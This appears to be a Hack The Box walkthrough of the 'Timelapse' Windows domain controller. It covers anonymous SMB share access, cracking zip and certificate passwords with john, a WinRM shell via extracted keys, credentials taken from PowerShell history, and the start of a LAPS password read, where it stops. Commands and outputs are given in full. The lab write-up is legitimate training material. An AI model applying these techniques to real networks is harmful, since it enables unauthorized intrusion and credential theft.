┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.11.152
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-19 11:54:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-01-19T11:55:51
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h59m56s
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.11.152
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|VoIP phone|general purpose|phone
Running: Allen-Bradley embedded, Atcom embedded, Microsoft Windows 7|8|Phone|XP|2012, Palmmicro embedded, VMware Player
OS CPE: cpe:/h:allen-bradley:micrologix_1100 cpe:/h:atcom:at-320 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2012 cpe:/a:vmware:player
OS details: Allen Bradley MicroLogix 1100 PLC, Atcom AT-320 VoIP phone, Microsoft Windows Embedded Standard 7, Microsoft Windows 8.1 Update 1, Microsoft Windows Phone 7.5 or 8.0, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012, Palmmicro AR1688 VoIP module, VMware Player virtual NAT device
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.11.152
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-19 12:10:16Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
|_ssl-date: 2024-01-19T12:12:06+00:00; +7h59m57s from scanner time.
| tls-alpn:
|_ http/1.1
9389/tcp open mc-nmf .NET Message Framing
49669/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49734/tcp open msrpc Microsoft Windows RPC
61113/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-01-19T12:11:15
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h59m56s, deviation: 0s, median: 7h59m56s
This combination of ports (Kerberos + LDAP + DNS + SMB) suggest it is likely a domain controller. This is supported by the hostname identified at the bottom (DC01) and the name on the TLS cert on 5986 (dc01.timelapse.htb). LDAP scripts show a domain name of timelapse.htb as well. It’s a bit odd that no script data came back for SMB (445).
In HTB, I’ve regularly run into Windows Remoting / WinRM on TCP 5985. The TLS-wrapped version of that typically runs on TCP 5986, which is what is present here. I’ll be able to interact with it to get a shell if I can find a way to auth.
I’m not sure why nmap couldn’t get any details out of SMB, but crackmapexec does it with no issue:
┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.11.152
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[!] Something weird happened: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.) on line 970
┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.11.152 -u null
[+] IP: 10.10.11.152:445 Name: 10.10.11.152 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
Shares READ ONLY
SYSVOL NO ACCESS Logon server share
[+] IPC$ READ ONLY Remote IPC
[+] Shares READ ONLY
As always, with SMB, it pays off to try different tools. crackmapexec isn’t able to list any shares:
But smbclient does (-L to list shares and -N for null authentication):
┌──(kali💀kali)-[~]
└─$ smbclient -L //dc01.timelapse.htb -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
NETLOGON and SYSVOL are standard for any domain controller (DC). Since it’s custom (and the only one I can read according to CME), I’ll start with Shares:
┌──(kali💀kali)-[~]
└─$ smbclient -N //dc01.timelapse.htb/Shares
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Oct 25 11:39:15 2021
.. D 0 Mon Oct 25 11:39:15 2021
Dev D 0 Mon Oct 25 15:40:06 2021
HelpDesk D 0 Mon Oct 25 11:48:42 2021
Dev has a single file, which I’ll grab:
smb: \> cd Dev
smb: \Dev\> ls
. D 0 Mon Oct 25 15:40:06 2021
.. D 0 Mon Oct 25 15:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 11:46:42 2021
smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (1.4 KiloBytes/sec) (average 1.4 KiloBytes/sec)
HelpDesk has a few files, all about LAPS:
smb: \> cd HelpDesk
smb: \HelpDesk\> ls
. D 0 Mon Oct 25 11:48:42 2021
.. D 0 Mon Oct 25 11:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 10:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 10:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 10:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 10:57:44 2021
Local Administrator Password Solution (LAPS) is a method of managing the passwords for the local administrator accounts via the domain. Without laps, it’s very challenging for a support team to manage keeping unique local admin passwords for each system. This leads to shared credentials, which means that when an attacker gets elevated privileges on a system, they can dump the shared cred and use it to get access on other systems.
LAPS also rotates administrator passwords, changing them periodically, such that if they are captured by an attacker, they become invalid after some period of time.
Shell as legacyy
Access winrm_backup.zip:
The zip archive from SMB has a single file:
┌──(kali💀kali)-[~/Desktop]
└─$ unzip -l winrm_backup.zip
Archive: winrm_backup.zip
Length Date Time Name
--------- ---------- ----- ----
2555 2021-10-25 10:21 legacyy_dev_auth.pfx
--------- -------
2555 1 file
Based on the name, it seems to contain authentication, either for a user named dev or legacyy. A .pfx file typically represents the PKCS#12 format, containing both a public and private key for a user. Given the archive name and this file type, it seems likely that if I can get access to this file, I’ll be able to get a shell over WinRM on Timelapse.
Crack Zip Password
Trying to open the downloaded archive requires a password:
The hash format doesn’t match anything on the Hashcat list of example hashes, as hashcat actually can’t brute this kind of hash.
I’ll use john:
┌──(kali💀kali)-[~/Desktop]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt winrm_backup.zip.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2024-01-19 05:14) 1.754g/s 6100Kp/s 6100Kc/s 6100KC/s surkerior..supalove
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
It cracks it instantly (even in a VM) to “supremelegacy”. It works to unzip:
supremelegacy
Obtain Keys
Crack pfx Password This post shows the openssl commands to extract the private key and certificate (public key) from a .pfx file. Unfortunately, this one requires a password:
┌──(kali💀kali)-[~/Desktop]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key
Enter Import Password:
Mac verify error: invalid password?
pfx2john.py will generate a hash for it (piped into tee to both save it to a file and examine the output):
pfx2john.py legacyy_dev_auth.pfx | tee legacyy_dev_auth.pfx.hash
This time it takes john about half a minute to find the password “thuglegacy”:
Extract Keys
With the password, I can extract the key and certificate. When extracting the key, it asks for the password (I’ll provide “thuglegacy”), and then a password for the output .pem file (anything I want, must be at least four characters):
┌──(kali💀kali)-[~/Desktop]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key-enc
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
I’ll decrypt the key using the password I set above so I don’t have to remember it:
┌──(kali💀kali)-[~/Desktop]
└─$ openssl rsa -in legacyy_dev_auth.key-enc -out legacyy_dev_auth.key
Enter pass phrase for legacyy_dev_auth.key-enc:
writing RSA key
┌──(kali💀kali)-[~/Desktop]
└─$ ls legacyy_dev_auth.*
legacyy_dev_auth.crt legacyy_dev_auth.key-enc legacyy_dev_auth.pfx.hash
legacyy_dev_auth.key legacyy_dev_auth.pfx
Evil-WinRM:
evil-winrm is the best tool for connecting to WinRM from a Linux host. Looking at the usage shows how I’ll use these keys to connect:
┌──(kali💀kali)-[~/Desktop]
└─$ evil-winrm -h
I’ll use the following:
-S - Enable SSL, because I’m connecting to 5986;
-c legacyy_dev_auth.crt - provide the public key certificate
-k legacyy_dev_auth.key - provide the private key
-i timelapse.htb - host to connect to
It works to get a shell as legacyy:
┌──(kali💀kali)-[~/Desktop]
└─$ evil-winrm -i timelapse.htb -S -k legacyy_dev_auth.key -c legacyy_dev_auth.crt
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy
*Evil-WinRM* PS C:\Users\legacyy> cd Desktop
*Evil-WinRM* PS C:\Users\legacyy\Desktop> type user.txt
194bb0ca3cce---------------
Shell as svc_deploy
Enumeration:
There’s nothing too special about the legacyy user
*Evil-WinRM* PS C:\Users\legacyy\Desktop> net user legacyy
User name legacyy
Full Name Legacyy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/23/2021 11:17:10 AM
Password expires Never
Password changeable 10/24/2021 11:17:10 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/19/2024 10:26:03 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users *Development
They are in the “Remote Management Users” group, but I know that because without that group I wouldn’t have been able to execute commands or get a shell over WinRM. The “Development” group could be interesting. I’ll keep an eye out for places that may allow legacyy to go.
No interesting privileges:
*Evil-WinRM* PS C:\Users\legacyy\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
PowerShell History:
One place I always check on Windows hosts is the PowerShell history file. And it’s present here:
*Evil-WinRM* PS C:\Users\legacyy\Desktop> cd C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine>
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> ls
Directory: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/3/2022 11:46 PM 434 ConsoleHost_history.txt
If I didn’t think to check it manually, WinPEAS would also have showed it.
The file contains some history, including connecting to this host using the creds for the svc_deploy user:
Enumeration
No additional privileges as svc_deploy:
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
There is a really interesting group:
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> net user svc_deploy
User name svc_deploy
Full Name svc_deploy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/25/2021 11:12:37 AM
Password expires Never
Password changeable 10/26/2021 11:12:37 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 10/25/2021 11:25:53 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *LAPS_Readers *Domain Users
LAPS_Readers seems to imply svc_deploy has access to read from LAPS.
LAPS
With LAPS, the DC manages the local administrator passwords for computers on the domain. It is common to create a group of users and give them permissions to read these passwords, allowing the trusted administrators access to all the local admin passwords.
Read Password:
To read the LAPS password, I just need to use Get-ADComputer and specifically request the ms-mcs-admpwd property:
